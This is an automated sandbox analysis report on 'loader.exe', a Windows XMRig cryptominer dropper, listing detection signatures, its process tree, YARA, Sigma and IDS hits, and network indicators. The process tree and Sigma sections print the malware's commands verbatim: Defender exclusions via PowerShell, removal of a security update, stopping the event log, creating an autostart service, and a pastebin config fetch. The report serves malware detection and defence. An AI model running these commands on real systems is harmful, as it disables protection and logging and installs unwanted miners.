Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
loader.exe

Overview

General Information

Sample name:loader.exe
Analysis ID:1537414
MD5:cdabdc02374167ccd4938e9fe8c31789
SHA1:59028bd5da928a0aadf157c39ac2c9281dcc881d
SHA256:9161be21746469b9b3c653b81d7ca6639927e89ece780a4682a2059ba30e2793
Tags:exeuser-aachum
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Connects to a pastebin service (likely for C&C)
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • loader.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\loader.exe" MD5: CDABDC02374167CCD4938E9FE8C31789)
    • powershell.exe (PID: 5020 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6096 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7200 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 3864 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4476 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1780 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6820 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 6952 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 552 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 628 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 920 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 2488 cmdline: C:\Windows\system32\sc.exe delete "NUTGFFPE" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7220 cmdline: C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7272 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7280 cmdline: C:\Windows\system32\sc.exe start "NUTGFFPE" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wepulfrfkvoz.exe (PID: 7348 cmdline: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe MD5: CDABDC02374167CCD4938E9FE8C31789)
    • powershell.exe (PID: 7372 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7832 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • powercfg.exe (PID: 7564 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7580 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7596 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7620 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7648 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 364 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 356 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 696 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 592 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1044 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1084 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1200 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1252 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1296 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1316 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1408 cmdline: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1488 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1496 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 7712 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 7784 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      43.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        43.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x37ef98:$a1: mining.set_target
        • 0x371220:$a2: XMRIG_HOSTNAME
        • 0x373b48:$a3: Usage: xmrig [OPTIONS]
        • 0x3711f8:$a4: XMRIG_VERSION
        43.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
        • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
        43.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
        • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
        • 0x3cd180:$s3: \\.\WinRing0_
        • 0x376148:$s4: pool_wallet
        • 0x3705f0:$s5: cryptonight
        • 0x370600:$s5: cryptonight
        • 0x370610:$s5: cryptonight
        • 0x370620:$s5: cryptonight
        • 0x370638:$s5: cryptonight
        • 0x370648:$s5: cryptonight
        • 0x370658:$s5: cryptonight
        • 0x370670:$s5: cryptonight
        • 0x370680:$s5: cryptonight
        • 0x370698:$s5: cryptonight
        • 0x3706b0:$s5: cryptonight
        • 0x3706c0:$s5: cryptonight
        • 0x3706d0:$s5: cryptonight
        • 0x3706e0:$s5: cryptonight
        • 0x3706f8:$s5: cryptonight
        • 0x370710:$s5: cryptonight
        • 0x370720:$s5: cryptonight
        • 0x370730:$s5: cryptonight

        Sigma Signatures

        Change of critical system settings

        barindex
        Sigma detected: Disable power options
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3864, ProcessName: powercfg.exe

        System Summary

        barindex
        Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5020, ProcessName: powershell.exe
        Sigma detected: Powershell Defender Exclusion
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5020, ProcessName: powershell.exe
        Sigma detected: Uncommon Svchost Parent Process
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 6952, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
        Sigma detected: New Service Creation Using Sc.EXE
        Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "NUTGFFPE" binpath= "C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exe" start= "auto", ProcessId: 7220, ProcessName: sc.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 5020, ProcessName: powershell.exe

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Sigma detected: Stop EventLog
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\loader.exe", ParentImage: C:\Users\user\Desktop\loader.exe, ParentProcessId: 3228, ParentProcessName: loader.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 7272, ProcessName: sc.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-18T23:09:19.985310+020020362892Crypto Currency Mining Activity Detected192.168.2.4534401.1.1.153UDP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-18T23:09:21.900075+020020542471A Network Trojan was detected104.20.4.235443192.168.2.449735TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-10-18T23:09:21.281682+020028269302Crypto Currency Mining Activity Detected192.168.2.449736142.202.242.43443TCP

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeReversingLabs: Detection: 63%
        Multi AV Scanner detection for submitted file
        Source: loader.exeReversingLabs: Detection: 63%
        AI detected suspicious sample
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

        Bitcoin Miner

        barindex
        Yara detected Xmrig cryptocurrency miner
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
        Source: Yara matchFile source: 43.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0000002B.00000002.3126900800.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Found strings related to Crypto-Mining
        Source: dialer.exeString found in binary or memory: cryptonight-monerov7
        Source: loader.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC64DCE0 FindFirstFileExW,20_2_00000225DC64DCE0
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6ADCE0 FindFirstFileExW,20_2_00000225DC6ADCE0
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AEDCE0 FindFirstFileExW,26_2_00000202C0AEDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66130DCE0 FindFirstFileExW,29_2_000002A66130DCE0
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDFDCE0 FindFirstFileExW,30_2_000002BAAEDFDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879CDCE0 FindFirstFileExW,45_2_0000026A879CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537ADCE0 FindFirstFileExW,46_2_00000179537ADCE0
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D56DCE0 FindFirstFileExW,47_2_000002295D56DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000025306E6DCE0 FindFirstFileExW,50_2_0000025306E6DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001845B3CDCE0 FindFirstFileExW,51_2_000001845B3CDCE0
        Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001ADECD4DCE0 FindFirstFileExW,53_2_000001ADECD4DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D55907DCE0 FindFirstFileExW,54_2_000001D55907DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000241A9EADCE0 FindFirstFileExW,55_2_00000241A9EADCE0
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD7319DCE0 FindFirstFileExW,56_2_000001CD7319DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E89DCE0 FindFirstFileExW,57_2_000002824E89DCE0
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B3DCE0 FindFirstFileExW,58_2_0000021B47B3DCE0

        Networking

        barindex
        Suricata IDS alerts for network traffic
        Source: Network trafficSuricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.4.235:443 -> 192.168.2.4:49735
        Connects to a pastebin service (likely for C&C)
        Source: unknownDNS query: name: pastebin.com
        Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
        Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
        Source: Joe Sandbox ViewIP Address: 142.202.242.43 142.202.242.43
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.4:53440 -> 1.1.1.1:53
        Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.4:49736 -> 142.202.242.43:443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /raw/f2EfCEn0 HTTP/1.1Accept: */*Connection: closeHost: pastebin.comUser-Agent: cpp-httplib/0.12.6
        Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
        Source: global trafficDNS traffic detected: DNS query: pastebin.com
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/Root.crl0
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/primobject.crl0
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
        Source: wepulfrfkvoz.exe, 00000019.00000003.1877347807.000001B8C6200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
